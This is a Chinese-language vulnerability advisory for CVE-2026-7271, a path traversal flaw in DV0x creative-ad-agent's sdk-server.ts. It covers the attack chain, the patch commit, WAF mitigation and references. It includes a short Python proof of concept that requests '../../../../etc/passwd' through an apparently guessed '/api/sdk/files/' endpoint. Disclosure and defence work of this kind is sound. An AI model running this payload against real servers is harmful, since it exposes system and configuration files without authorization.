CVE-2026-7271 CVSS 5.3 中危

CVE-2026-7271 DV0x creative-ad-agent路径遍历漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7271

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DV0x creative-ad-agent

漏洞概述

DV0x creative-ad-agent组件在751b9e5146604dc65049bd0f62dcbdad6212f8a3及之前的版本中存在路径遍历漏洞。该漏洞位于creative-ad-agent-server组件的server/sdk-server.ts文件中。攻击者可以通过操作req.params参数来利用此漏洞，从而在无需认证的情况下远程读取系统敏感文件。目前该漏洞利用代码已公开，建议用户尽快应用补丁3d255865a957f3740b8724dd914502c0f44d4970进行修复。

技术细节

该漏洞源于DV0x creative-ad-agent服务器的server/sdk-server.ts文件中未正确过滤用户输入。具体而言，某个接口在处理请求参数（req.params）时，未对包含路径遍历字符（如../）的输入进行充分的校验和清洗。由于该产品采用滚动发布模式，版本号不固定，但受影响代码提交号为751b9e5146604dc65049bd0f62dcbdad6212f8a3。攻击者可构造特制的HTTP请求，利用该缺陷绕过文件访问限制，读取服务器上预期访问范围之外的任意文件。该漏洞攻击复杂度低，无需用户交互和身份认证即可远程利用，对系统机密性构成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标运行的是DV0x creative-ad-agent服务，且版本低于或等于包含漏洞的提交751b9e5。

STEP 2

2. 发送恶意请求

攻击者向server/sdk-server.ts对应的API端点发送特制请求，在req.params参数中插入路径遍历序列（如'../'）。

STEP 3

3. 服务器处理漏洞

服务器未对req.params进行有效清洗，直接将其用于文件路径操作，导致路径跳转到预期目录之外。

STEP 4

4. 数据泄露

服务器响应返回了攻击者请求的敏感文件内容（如/etc/passwd或配置文件），实现信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = "http://target-host:port"
# Vulnerable parameter: req.params
# Payload uses path traversal sequences
payload = "../../../../etc/passwd"

# Assuming the endpoint maps to the vulnerable function in sdk-server.ts
url = f"{target}/api/sdk/files/{payload}"

try:
    response = requests.get(url)
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Exploit successful! Sensitive file content retrieved:")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
    print(f"Error: {e}")

影响范围

DV0x creative-ad-agent <= 751b9e5146604dc65049bd0f62dcbdad6212f8a3

防御指南

临时缓解措施

在未应用补丁前，建议在Web应用防火墙（WAF）中添加规则，拦截包含 '../' 或 '%2e%2e' 等路径遍历特征的请求。同时，限制服务器对非必要目录的读取权限，减少潜在的信息泄露风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7271
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7271
3 Details https://www.cvedetails.com/cve/CVE-2026-7271/
4 VulDB https://vuldb.com/cve/CVE-2026-7271
5 Link https://github.com/DV0x/creative-ad-agent/
6 Link https://github.com/DV0x/creative-ad-agent/commit/3d255865a957f3740b8724dd914502c0f44d4970
7 Link https://github.com/DV0x/creative-ad-agent/issues/1
8 Link https://vuldb.com/submit/802887
9 Link https://vuldb.com/vuln/359926
10 Link https://vuldb.com/vuln/359926/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表